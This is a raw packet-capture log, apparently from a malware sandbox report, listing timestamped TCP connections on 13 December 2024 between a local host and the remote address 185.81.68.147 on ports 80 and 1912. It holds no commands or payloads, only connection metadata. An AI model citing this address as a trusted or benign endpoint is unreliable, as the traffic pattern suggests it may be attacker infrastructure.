                                                                                                                                                                                                Dec 13, 2024 08:19:06.263036966 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.352349997 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.352447987 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.352639914 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.353142977 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.353223085 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.353286982 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.354670048 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.355278015 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.355289936 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.355340004 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.356724024 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.356791973 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.356986046 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.358284950 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.358341932 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.358342886 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.359868050 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.360011101 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.360075951 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.361315966 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.361335039 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.361398935 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.362716913 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.362770081 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.362838030 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.364171982 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.364262104 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.364335060 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.365736961 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.365750074 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.365792036 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.367129087 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.367140055 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.367196083 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.368527889 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.368581057 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.368674994 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.369941950 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.370048046 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.370110035 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.371332884 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.371407986 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.371531010 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.372745037 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.372756004 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.372806072 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.374047995 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.374269962 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.374335051 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.375391006 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.375643015 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.375706911 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.376727104 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.376779079 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.376842022 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.378153086 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.378164053 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.378237009 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.379381895 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.379579067 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.379647970 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.380731106 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.380747080 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.380799055 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.382101059 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.382112026 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.382169008 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.383363962 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.383409023 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.383470058 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.384706020 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.384717941 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.384772062 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.385936975 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.385982990 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.386045933 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.387178898 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.387190104 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.387238979 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.388400078 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.388518095 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.388581038 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.389698029 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.389710903 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.389759064 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.391068935 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.391079903 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.391138077 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.392316103 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.392374039 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.392409086 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.512154102 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.637609005 CET4976880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.757505894 CET8049768185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.757584095 CET4976880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.757635117 CET4976880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.877301931 CET8049768185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:06.877407074 CET4976880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:06.997061014 CET8049768185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:08.212950945 CET8049768185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:08.213088989 CET8049768185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:08.213203907 CET4976880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:08.232125044 CET4976880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:08.340481997 CET4977380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:08.352169037 CET8049768185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:08.460488081 CET8049773185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:08.460630894 CET4977380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:08.460688114 CET4977380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:08.580389977 CET8049773185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:08.580501080 CET4977380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:08.701150894 CET8049773185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:09.900758028 CET8049773185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:09.901546955 CET8049773185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:09.902600050 CET4977380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:09.902723074 CET4977380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:10.012402058 CET4977980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:10.022500992 CET8049773185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:10.136358023 CET8049779185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:10.136532068 CET4977980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:10.136650085 CET4977980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:10.204185009 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:10.258387089 CET8049779185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:10.258452892 CET4977980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:10.324846983 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:10.378185034 CET8049779185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:10.659029007 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:10.659045935 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:10.659126043 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:10.659140110 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:10.659154892 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:10.659173012 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:10.659187078 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:10.659285069 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:10.659285069 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:11.513947010 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:11.606226921 CET8049779185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:11.606288910 CET8049779185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:11.606391907 CET4977980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:11.607726097 CET4977980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:11.633704901 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:11.715640068 CET4978580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:11.728053093 CET8049779185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:11.836364985 CET8049785185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:11.836538076 CET4978580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:11.836623907 CET4978580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:11.946576118 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:11.956543922 CET8049785185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:11.956605911 CET4978580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:11.961997986 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:12.076349974 CET8049785185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:12.081762075 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:12.394772053 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:12.400352955 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:12.520071983 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:12.832782984 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:12.859879017 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:12.981976032 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:13.294812918 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:13.294845104 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:13.294943094 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:13.299000025 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:13.299030066 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:13.299140930 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:13.307437897 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:13.355700016 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:13.432131052 CET8049785185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:13.432327986 CET8049785185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:13.432514906 CET4978580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:13.441732883 CET4978580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:13.561157942 CET4979180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:13.561491966 CET8049785185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:13.681308031 CET8049791185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:13.682873964 CET4979180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:13.724195957 CET4979180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:13.736991882 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:13.844995975 CET8049791185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:13.846744061 CET4979180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:13.856874943 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:13.856986046 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:13.857023001 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:13.857059956 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:13.857124090 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:13.857161045 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:13.857192993 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:13.857220888 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:13.966523886 CET8049791185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.199546099 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.246366024 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.356841087 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.476881981 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.476937056 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.476947069 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.476949930 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.476955891 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.477024078 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.477072954 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.477083921 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.477118015 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.477145910 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.477152109 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.477190971 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.477212906 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.477262974 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.477292061 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.477302074 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.477355957 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.477425098 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.477436066 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.477511883 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.477560043 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.477570057 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.477606058 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.477629900 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.477699041 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.477744102 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.477751970 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.477797985 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.477876902 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.477932930 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.523894072 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.523955107 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.596863985 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.596920013 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.597016096 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.597063065 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.597112894 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.597158909 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.597197056 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.597276926 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.597322941 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.597366095 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.597434998 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.597481012 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.597510099 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.597539902 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.597569942 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.597681046 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.597748041 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.597764015 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.597845078 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.597858906 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.597902060 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.597945929 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.597984076 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.598069906 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.598112106 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.598181009 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.598191023 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.598237038 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.598295927 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.598319054 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.598336935 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.598365068 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.598474979 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.598484993 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.598510981 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.598587036 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.598596096 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.598773956 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.598783016 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.598838091 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.598921061 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.840058088 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.904706001 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.904735088 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.904809952 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.904819012 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.904823065 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.904833078 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.904841900 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.904850006 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.904850960 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.904861927 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.904870987 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.904880047 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.904889107 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.904897928 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.904902935 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.904906034 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.904915094 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.904927015 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.904937983 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.904947042 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.904951096 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.904957056 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.904967070 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.904975891 CET191249760185.81.68.147192.168.2.11
